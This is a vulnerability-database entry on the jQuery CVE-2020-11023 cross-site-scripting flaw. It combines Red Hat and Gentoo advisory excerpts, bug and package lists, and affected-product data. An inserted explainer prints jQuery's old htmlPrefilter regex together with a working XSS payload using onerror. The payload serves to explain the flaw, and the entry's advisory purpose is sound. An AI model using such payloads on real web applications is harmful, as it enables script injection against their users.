VAR-202004-2199
Vulnerability from variot - Updated: 2026-04-10 23:34

In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery is an open source, cross-browser JavaScript library originally developed by the American programmer John Resig. The library simplifies interaction between HTML and JavaScript and supports modularization and plug-in extension. A cross-site scripting vulnerability exists in jQuery versions from 1.0.3 up to, but not including, 3.5.0. The vulnerability stems from a lack of proper validation of client-supplied data in web applications. An attacker could exploit this vulnerability to execute client-side code. 8) - aarch64, noarch, ppc64le, s390x, x86_64
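The mechanism behind these jQuery advisories can be shown in miniature. Before 3.5.0, jQuery's htmlPrefilter expanded XHTML-style self-closing tags with a regex before handing markup to the browser. The sketch below reproduces that regex from the pre-3.5.0 jQuery source; the payload string is a commonly cited proof-of-concept shape and is shown purely as an illustration:

```javascript
// Pre-3.5.0 jQuery rewrote self-closing tags like <x/> into <x></x>
// inside jQuery.htmlPrefilter. Regex as in the pre-3.5.0 source (rxhtmlTag):
const rxhtmlTag = /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi;

function legacyHtmlPrefilter(html) {
  return html.replace(rxhtmlTag, "<$1></$2>");
}

// As raw HTML this string is inert: the "/><img ..." part is merely the
// value of the title attribute.
const payload = '<img alt="<x" title="/><img src=url404 onerror=alert(1)>">';

// After the rewrite, the attribute value is broken open and the second
// <img> becomes a real element whose onerror handler would fire.
const rewritten = legacyHtmlPrefilter(payload);
console.log(rewritten);
```

jQuery 3.5.0 resolved the issue by making htmlPrefilter an identity function, which is why upgrading (rather than sanitizing harder) is the recommended fix in the advisories above.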
- Description:
The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.

Bugs fixed (https://bugzilla.redhat.com/):

1376706 - restore SerialNumber tag in caManualRenewal xml
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests
1406505 - KRA ECC installation failed with shared tomcat
1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute
1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip
1666907 - CC: Enable AIA OCSP cert checking for entire cert chain
1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute
1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute
1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab
1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection
1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page
1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page
1721684 - Rebase pki-servlet-engine to 9.0.30
1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed.
1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA
1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped.
1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page
1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp
1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server
1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI
1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak
1824939 - JSS: add RSA PSS support - RHEL 8.3
1824948 - add RSA PSS support - RHEL 8.3
1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit
1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injection in the jQuery.htmlPrefilter method
1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8]
1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8]
1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password
1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired="true" but no secret
1850004 - CVE-2020-11023 jquery: Passing HTML containing <option> elements to manipulation methods could result in untrusted code execution
1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException
1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing
1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates
1855319 - Not able to launch pkiconsole
1856368 - kra-key-generate request is failing
1857933 - CA Installation is failing with ncipher v12.30 HSM
1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request
1869893 - Common certificates are missing in CS.cfg on shared PKI instance
1871064 - replica install failing during pki-ca component configuration
1873235 - pki ca-user-cert-add with secure port failed with 'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'
- Description:
Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.

- Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.

JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001
JBEAP-23865 - GSS Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001
JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001
JBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9
JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001
JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001
JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001
JBEAP-24100 - GSS Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001
JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value
JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001
JBEAP-24132 - GSS Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001
JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001
JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002
JBEAP-24191 - GSS Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001
JBEAP-24195 - GSS Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001
JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003
JBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2
JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001
JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis:          Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update
Advisory ID:       RHSA-2022:6393-01
Product:           Red Hat Virtualization
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6393
Issue date:        2022-09-08
CVE Names:         CVE-2020-11022 CVE-2020-11023 CVE-2021-22096
                   CVE-2021-23358 CVE-2022-2806 CVE-2022-31129
====================================================================

1. Summary:
Updated ovirt-engine packages that fix several bugs and add various enhancements are now available.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
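For reference, the CVSS v2 base score quoted for these CVEs can be reproduced directly from the vector string using the standard v2 equations. The sketch below is illustrative (the helper name is ours; the metric weights are those defined in the CVSS v2 specification) and recomputes the 4.3 MEDIUM base score NVD assigns to CVE-2020-11023's vector AV:N/AC:M/Au:N/C:N/I:P/A:N:

```javascript
// Hypothetical helper: recompute a CVSS v2 base score from a vector
// string. Metric weights are taken from the CVSS v2 specification.
const AV = { L: 0.395, A: 0.646, N: 1.0 };     // AccessVector
const AC = { H: 0.35, M: 0.61, L: 0.71 };      // AccessComplexity
const AU = { M: 0.45, S: 0.56, N: 0.704 };     // Authentication
const CIA = { N: 0.0, P: 0.275, C: 0.66 };     // Conf/Integ/Avail impact

function cvss2Base(vector) {
  const m = Object.fromEntries(vector.split("/").map(p => p.split(":")));
  const impact =
    10.41 * (1 - (1 - CIA[m.C]) * (1 - CIA[m.I]) * (1 - CIA[m.A]));
  const exploitability = 20 * AV[m.AV] * AC[m.AC] * AU[m.Au];
  const f = impact === 0 ? 0 : 1.176; // f(Impact) per the v2 spec
  const score = (0.6 * impact + 0.4 * exploitability - 1.5) * f;
  return Math.round(score * 10) / 10; // round to one decimal place
}

// Vector NVD lists for CVE-2020-11023:
console.log(cvss2Base("AV:N/AC:M/Au:N/C:N/I:P/A:N")); // 4.3
```

The intermediate values (impact 2.9, exploitability 8.6) match the sub-scores recorded in the database entry below.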
- Relevant releases/architectures:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch
- Description:
The ovirt-engine package provides the Red Hat Virtualization Manager, a centralized management platform that allows system administrators to view and manage virtual machines. The Manager provides a comprehensive range of features including search capabilities, resource management, live migrations, and virtual infrastructure provisioning.
Security Fix(es):
- nodejs-underscore: Arbitrary code execution via the template function (CVE-2021-23358)

- moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

- jquery: Cross-site scripting due to improper injection in the jQuery.htmlPrefilter method (CVE-2020-11022)

- jquery: Untrusted code execution via <option> tag in HTML passed to DOM manipulation methods (CVE-2020-11023)

- ovirt-log-collector: RHVM admin password is logged unfiltered (CVE-2022-2806)

- springframework: malicious input leads to insertion of additional log entries (CVE-2021-22096)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
- Previously, running engine-setup did not always renew OVN certificates that were close to expiration or already expired. With this release, OVN certificates are always renewed by engine-setup when needed. (BZ#2097558)

- Previously, the Manager issued warnings of approaching certificate expiration before engine-setup could update certificates. In this release, expiration warnings and certificate update periods are aligned, and certificates are updated as soon as expiration warnings occur. (BZ#2097725)

- With this release, OVA export and import work on hosts with a non-standard SSH port. (BZ#2104939)

- With this release, the certificate validity test is compatible with both RHEL 8 and RHEL 7 based hypervisors. (BZ#2107250)

- RHV 4.4 SP1 and later are supported only on RHEL 8.6; customers cannot use RHEL 8.7 or later and must stay on RHEL 8.6 EUS. (BZ#2108985)

- Previously, importing templates from the Administration Portal did not work. With this release, importing templates from the Administration Portal is possible. (BZ#2109923)

- ovirt-provider-ovn certificate expiration is checked along with the other RHV certificates. If the ovirt-provider-ovn certificate is about to expire or has already expired, a warning or alert is raised in the audit log. To renew the ovirt-provider-ovn certificate, administrators must run engine-setup. If your ovirt-provider-ovn certificate expired on a previous RHV version, upgrade to RHV 4.4 SP1 batch 2 or later, and the ovirt-provider-ovn certificate will be renewed automatically during engine-setup. (BZ#2097560)

- Previously, when importing a virtual machine with manual CPU pinning, the manual pinning string was cleared, but the CPU pinning policy was not set to NONE. As a result, importing failed. In this release, the CPU pinning policy is set to NONE if the CPU pinning string is cleared, and importing succeeds. (BZ#2104115)

- Previously, the Manager could start a virtual machine with a Resize and Pin NUMA policy on a host whose number of physical sockets did not equal its number of NUMA nodes. As a result, wrong pinning was assigned to the policy. With this release, the Manager does not allow the virtual machine to be scheduled on such a host, and the pinning is correct based on the algorithm. (BZ#1955388)

- Rebase package(s) to version: 4.4.7. Highlights, important fixes, or notable enhancements: fixed BZ#2081676 (BZ#2104831)

- In this release, rhv-log-collector-analyzer provides detailed output for each problematic image, including disk names, associated virtual machine, the host running the virtual machine, snapshots, and current SPM. The detailed view is now the default. The compact option can be set by using the --compact switch in the command line. (BZ#2097536)

- UnboundID LDAP SDK has been rebased on upstream version 6.0.4. See https://github.com/pingidentity/ldapsdk/releases for changes since version 4.0.14. (BZ#2092478)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/2974891
- Bugs fixed (https://bugzilla.redhat.com/):

1944286 - CVE-2021-23358 nodejs-underscore: Arbitrary code execution via the template function
1955388 - Auto Pinning Policy only pins some of the vCPUs on a single NUMA host
1974974 - Not possible to determine migration policy from the API, even though documentation reports that it can be done.
2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries
2080005 - CVE-2022-2806 ovirt-log-collector: RHVM admin password is logged unfiltered
2092478 - Upgrade unboundid-ldapsdk to 6.0.4
2094577 - rhv-image-discrepancies must ignore small disks created by OCP
2097536 - [RFE] Add disk name and uuid to problems output
2097558 - Renew ovirt-provider-ovn.cer certificates during engine-setup
2097560 - Warning when ovsdb-server certificates are about to expire (OVN certificate)
2097725 - Certificate Warn period and automatic renewal via engine-setup do not match
2104115 - RHV 4.5 cannot import VMs with cpu pinning
2104831 - Upgrade ovirt-log-collector to 4.4.7
2104939 - Export OVA when using host with port other than 22
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
2107250 - Upgrade of the host failed as the RHV 4.3 hypervisor is based on RHEL 7 with openssl 1.0.z, but RHV Manager 4.4 uses the openssl 1.1.z syntax
2107267 - ovirt-log-collector doesn't generate database dump
2108985 - RHV 4.4 SP1 EUS requires RHEL 8.6 EUS (RHEL 8.7+ releases are not supported on RHV 4.4 SP1 EUS)
2109923 - Error when importing templates in Admin portal
- Package List:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:
Source:
ovirt-engine-4.5.2.4-0.1.el8ev.src.rpm
ovirt-engine-dwh-4.5.4-1.el8ev.src.rpm
ovirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.src.rpm
ovirt-engine-ui-extensions-1.3.5-1.el8ev.src.rpm
ovirt-log-collector-4.4.7-2.el8ev.src.rpm
ovirt-web-ui-1.9.1-1.el8ev.src.rpm
rhv-log-collector-analyzer-1.0.15-1.el8ev.src.rpm
unboundid-ldapsdk-6.0.4-1.el8ev.src.rpm
vdsm-jsonrpc-java-1.7.2-1.el8ev.src.rpm
noarch:
ovirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-backend-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-dbscripts-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-dwh-4.5.4-1.el8ev.noarch.rpm
ovirt-engine-dwh-grafana-integration-setup-4.5.4-1.el8ev.noarch.rpm
ovirt-engine-dwh-setup-4.5.4-1.el8ev.noarch.rpm
ovirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.noarch.rpm
ovirt-engine-extension-aaa-ldap-setup-1.4.6-1.el8ev.noarch.rpm
ovirt-engine-health-check-bundler-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-restapi-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-setup-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-setup-base-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-setup-plugin-cinderlib-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-setup-plugin-imageio-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-setup-plugin-ovirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-setup-plugin-ovirt-engine-common-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-setup-plugin-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-tools-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-tools-backup-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-ui-extensions-1.3.5-1.el8ev.noarch.rpm
ovirt-engine-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-webadmin-portal-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-engine-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm
ovirt-log-collector-4.4.7-2.el8ev.noarch.rpm
ovirt-web-ui-1.9.1-1.el8ev.noarch.rpm
python3-ovirt-engine-lib-4.5.2.4-0.1.el8ev.noarch.rpm
rhv-log-collector-analyzer-1.0.15-1.el8ev.noarch.rpm
rhvm-4.5.2.4-0.1.el8ev.noarch.rpm
unboundid-ldapsdk-6.0.4-1.el8ev.noarch.rpm
unboundid-ldapsdk-javadoc-6.0.4-1.el8ev.noarch.rpm
vdsm-jsonrpc-java-1.7.2-1.el8ev.noarch.rpm
vdsm-jsonrpc-java-javadoc-1.7.2-1.el8ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-11022
https://access.redhat.com/security/cve/CVE-2020-11023
https://access.redhat.com/security/cve/CVE-2021-22096
https://access.redhat.com/security/cve/CVE-2021-23358
https://access.redhat.com/security/cve/CVE-2022-2806
https://access.redhat.com/security/cve/CVE-2022-31129
https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBYxnqRtzjgjWX9erEAQiQOw//XOS172gkbNeuoMSW1IYiEpJG4zQIvT2J
VvyizOMlQzpe49Bkopu1zj/e8yM1eXNIg1elPzA3280z7ruNb4fkeoXT7vM5mB/0
jRAr1ja9ZHnZmEW60X3WVhEBjEXCeOv5CWBgqzdQWSB7RpPqfMP7/4kHGFnCPZxu
V/n+Z9YKoDxeiW19tuTdU5E5cFySVV8JZAlfXlrR1dz815Ugsm2AMk6uPwjQ2+C7
Uz3zLQLjRjxFk+qSph8NYbOZGnUkypWQG5KXPMyk/Cg3jewjMkjAhzgcTJAdolRC
q3p9kD5KdWRe+3xzjy6B4IsSSqvEyHphwrRv8wgk0vIAawfgi76+jL7n/C07rdpA
Qg6zlDxmHDrZPC42dsW6dXJ1QefRQE5EzFFJcoycqvWdlRfXX6D1RZc5knSQb2iI
3iSh+hVwxY9pzNZVMlwtDHhw8dqvgw7JimToy8vOldgK0MdndwtVmKsKsRzu7HyL
PQSvcN5lSv1X5FR2tnx9LMQXX1qn0P1d/8gTiRFm8Oabjx2r8I0/HNgnJpTSVSBO
DXjKFDmwpiT+6tupM39ZbWek2hh+PoyMZJb/d6/YTND6VNlzUypq+DFtLILEaM8Z
OjWz0YAL8/ihvhq0vSdFSMFcYKSWAOXA+6pSqe7N7WtB9hl0r7sLUaRSRHti1Ime
uF/GLDTKkPw=
=8zTJ
-----END PGP SIGNATURE-----

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce

.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 202007-03
https://security.gentoo.org/
Severity: Normal
Title: Cacti: Multiple vulnerabilities
Date: July 26, 2020
Bugs: #728678, #732522
ID: 202007-03
Synopsis
Multiple vulnerabilities have been found in Cacti, the worst of which could result in the arbitrary execution of code.
Background
Cacti is a complete frontend to rrdtool.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1  net-analyzer/cacti          < 1.2.13                >= 1.2.13
2  net-analyzer/cacti-spine    < 1.2.13                >= 1.2.13
-------------------------------------------------------------------
2 affected packages
Description
Multiple vulnerabilities have been discovered in Cacti. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All Cacti users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/cacti-1.2.13"
All Cacti Spine users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=net-analyzer/cacti-spine-1.2.13"
References
[ 1 ] CVE-2020-11022
      https://nvd.nist.gov/vuln/detail/CVE-2020-11022
[ 2 ] CVE-2020-11023
      https://nvd.nist.gov/vuln/detail/CVE-2020-11023
[ 3 ] CVE-2020-14295
      https://nvd.nist.gov/vuln/detail/CVE-2020-14295
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202007-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org/.
License
Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. Relevant releases/architectures:
6ComputeNode-RH6-A-MQ-Interconnect-1 - noarch, x86_64
6Server-RH6-A-MQ-Interconnect-1 - i386, noarch, x86_64
6Workstation-RH6-A-MQ-Interconnect-1 - i386, noarch, x86_64
7ComputeNode-RH7-A-MQ-Interconnect-1 - noarch, x86_64
7Server-RH7-A-MQ-Interconnect-1 - noarch, x86_64
7Workstation-RH7-A-MQ-Interconnect-1 - noarch, x86_64
8Base-A-MQ-Interconnect-1 - noarch, x86_64
- AMQ Interconnect provides flexible routing of messages between AMQP-enabled endpoints, whether they are clients, servers, brokers, or any other entity that can send or receive standard AMQP messages. For further information, refer to the release notes linked to in the References section.

Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.

JIRA issues fixed (https://issues.jboss.org/):
ENTMQIC-2448 - Allow specifying address/source/target to be used for a multitenant listener
ENTMQIC-2455 - Allow AMQP open properties to be supplemented from connector configuration
ENTMQIC-2460 - Adding new config address, autolinks and link routes become slower as more get added
ENTMQIC-2481 - Unable to delete listener with http enabled
ENTMQIC-2485 - The VhostNamePatterns does not work in OCP env
ENTMQIC-2492 - router drops TransactionalState on produced messages on link routes
- Description:
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an on-premises OpenShift Container Platform installation.
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.7"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "financial services revenue management and billing analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.8"
},
{
"_id": null,
"model": "hyperion financial reporting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.2.4"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.5.0"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.2.1"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.0"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.0.4"
},
{
"_id": null,
"model": "financial services revenue management and billing analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "7.0"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking enterprise collections",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.8.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.4"
},
{
"_id": null,
"model": "siebel mobile",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12"
},
{
"_id": null,
"model": "storagetek acsls",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.5.1"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "communications analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.1"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.14"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.1.3"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.4.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.5.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.10.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.0"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1.0"
},
{
"_id": null,
"model": "jquery",
"scope": "gte",
"trust": 1.0,
"vendor": "jquery",
"version": "1.0.3"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "peoplesoft enterprise human capital management resources",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "7.70"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19c"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4.0"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2.11"
},
{
"_id": null,
"model": "jquery",
"scope": "lt",
"trust": 1.0,
"vendor": "jquery",
"version": "3.5.0"
},
{
"_id": null,
"model": "oss support tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "2.12.41"
},
{
"_id": null,
"model": "cloud insights storage workload security agent",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
